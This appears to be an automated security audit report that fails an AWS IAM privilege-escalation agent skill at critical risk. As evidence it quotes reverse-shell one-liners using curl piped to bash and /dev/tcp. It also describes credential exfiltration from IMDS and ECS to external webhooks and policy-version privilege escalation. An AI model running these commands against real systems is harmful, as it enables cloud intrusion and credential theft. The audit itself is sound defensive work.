Skills
skills/wgpsec/aboutsecurity/aws-iam-privesc/Gen Agent Trust Hub

aws-iam-privesc

Fail

Audited by Gen Agent Trust Hub on May 4, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides multiple methods for executing remote code and establishing reverse shells on AWS compute resources.
  • Evidence in references/compute-privesc.md: Explicitly instructs the use of curl https://reverse-shell.sh/<attacker_host>:<port> | bash to execute remote payloads.
  • Evidence in references/compute-privesc.md: Demonstrates RCE via environment variable injection (PYTHONWARNINGS + BROWSER) in Lambda functions to spawn a reverse shell.
  • Evidence in references/compute-privesc.md: Uses bash -i >& /dev/tcp/<host>/<port> 0>&1 for interactive command shells.
  • [DATA_EXFILTRATION]: The skill documents techniques to harvest and exfiltrate sensitive cloud credentials to external servers.
  • Evidence in SKILL.md: Commands are provided to post security credentials from the Instance Metadata Service (IMDS) to an external <webhook> using curl.
  • Evidence in references/compute-privesc.md: Provides an ECS-specific pattern to exfiltrate AWS_CONTAINER_CREDENTIALS_RELATIVE_URI contents to an external URL.
  • Evidence in references/compute-privesc.md: Includes a Python Lambda script that explicitly reads /proc/self/environ to steal and return session tokens.
  • [COMMAND_EXECUTION]: The skill utilizes the AWS CLI for unauthorized privilege escalation and policy manipulation.
  • Evidence in SKILL.md: Provides commands to use iam:CreatePolicyVersion with the --set-as-default flag to grant */* permissions.
  • Evidence in references/iam-sts-privesc.md: Details methods for disabling or taking over MFA devices and modifying trust relationships to assume high-privilege roles.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
May 4, 2026, 08:15 AM